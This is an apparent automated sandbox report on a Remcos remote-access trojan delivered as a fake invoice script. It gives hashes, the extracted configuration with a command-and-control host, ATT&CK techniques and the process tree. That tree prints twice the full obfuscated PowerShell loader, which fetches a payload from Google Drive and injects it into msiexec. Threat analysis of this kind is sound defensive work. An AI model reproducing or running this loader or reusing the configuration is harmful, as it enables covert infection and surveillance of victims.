remcos | 670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b

General

Target

Faktura_82666410_1361590461·pdf.vbe
Size

74KB
MD5

f1a0355012d13febdfb56ee8d2b38012
SHA1

38fb764e45b496b63b7a49713fac2b411cfc524b
SHA256

670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b
SHA512

5b2b82e2b7fef9f2d1725ee2a13a98c415880abb41e5c7c7d3fedaed67b7b3decc616f5f12ae9231859f01ca56b31fcf16d0da4b90904a740ad8ba8a882b27fa
SSDEEP

1536:spE42QeC4Ud8kA8fEXzY+gRj+u6/GgRIHSHMy+eQ74Zf:sprLeyAsEtu6uKAO5f

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 9 IoCs

flow	pid	Process
17	2180	powershell.exe
20	2180	powershell.exe
38	3780	msiexec.exe
40	3780	msiexec.exe
44	3780	msiexec.exe
46	3780	msiexec.exe
47	3780	msiexec.exe
60	3780	msiexec.exe
63	3780	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1196	powershell.exe
2180	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	drive.google.com
38	drive.google.com
16	drive.google.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2180	powershell.exe
1196	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3780	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1196	powershell.exe
3780	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1196 set thread context of 3780	1196	powershell.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2180	powershell.exe
2180	powershell.exe
1196	powershell.exe
1196	powershell.exe
1196	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1196	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3780	msiexec.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 2180	2228	WScript.exe	82
PID 2228 wrote to memory of 2180	2228	WScript.exe	82
PID 1196 wrote to memory of 3780	1196	powershell.exe	93
PID 1196 wrote to memory of 3780	1196	powershell.exe	93
PID 1196 wrote to memory of 3780	1196	powershell.exe	93
PID 1196 wrote to memory of 3780	1196	powershell.exe	93
PID 1196 wrote to memory of 3780	1196	powershell.exe	93

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_82666410_1361590461·pdf.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
46c6efa8aee359b1e66b7fa9c183ef77

SHA1
2a98cbaeeab7123b72cbea4734e8e58b0befae99

SHA256
b14986129ba12f4e09c5226a5b548f06a955166a82b739839aee97006875aaea

SHA512
814ac0c861a90f6ded48b327c98630369de016811d2c3691a92227129bfc81f36035320ea14b7d0557fa12654345d0c2ee449cb694a208442c888734179b526c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
806286a9ea8981d782ba5872780e6a4c

SHA1
99fe6f0c1098145a7b60fda68af7e10880f145da

SHA256
cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

SHA512
362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hkuhihon.x5c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Kanalseparationen.Gte

Filesize
404KB

MD5
79bd3fbef131ecc854054049edcff107

SHA1
e9ed9087470ed08fb205afd7a16418877e58889b

SHA256
23fd943f1b414c05e01dc52336058af7fbb24ccd5ad727cb5489a1f6573fc229

SHA512
6f9252026339711bd298f0d9e4b4aa0bca02072c0b4b8f8ca5e8f46299a051bacba15bc2470abe47022a927879b633d41b5be995cce9265a33b5173461f3426b

Download Submit
memory/1196-42-0x0000000006C40000-0x0000000006C5A000-memory.dmp

Filesize
104KB

Download
memory/1196-44-0x00000000078D0000-0x00000000078F2000-memory.dmp

Filesize
136KB

Download
memory/1196-47-0x0000000009100000-0x0000000009CF2000-memory.dmp

Filesize
11.9MB

Download
memory/1196-45-0x0000000008B50000-0x00000000090F4000-memory.dmp

Filesize
5.6MB

Download
memory/1196-43-0x0000000007940000-0x00000000079D6000-memory.dmp

Filesize
600KB

Download
memory/1196-41-0x0000000007F20000-0x000000000859A000-memory.dmp

Filesize
6.5MB

Download
memory/1196-40-0x00000000066E0000-0x000000000672C000-memory.dmp

Filesize
304KB

Download
memory/1196-23-0x0000000005130000-0x0000000005166000-memory.dmp

Filesize
216KB

Download
memory/1196-24-0x0000000005950000-0x0000000005F78000-memory.dmp

Filesize
6.2MB

Download
memory/1196-26-0x00000000058A0000-0x0000000005906000-memory.dmp

Filesize
408KB

Download
memory/1196-27-0x0000000005FF0000-0x0000000006056000-memory.dmp

Filesize
408KB

Download
memory/1196-25-0x0000000005800000-0x0000000005822000-memory.dmp

Filesize
136KB

Download
memory/1196-37-0x00000000060B0000-0x0000000006404000-memory.dmp

Filesize
3.3MB

Download
memory/1196-39-0x00000000066B0000-0x00000000066CE000-memory.dmp

Filesize
120KB

Download
memory/2180-12-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-22-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-19-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-0-0x00007FF813923000-0x00007FF813925000-memory.dmp

Filesize
8KB

Download
memory/2180-18-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-15-0x00007FF813923000-0x00007FF813925000-memory.dmp

Filesize
8KB

Download
memory/2180-17-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-11-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-16-0x00007FF813920000-0x00007FF8143E1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-6-0x000001ADFF1C0000-0x000001ADFF1E2000-memory.dmp

Filesize
136KB

Download
memory/3780-62-0x0000000000C20000-0x0000000001E74000-memory.dmp

Filesize
18.3MB

Download

Analysis

Sharing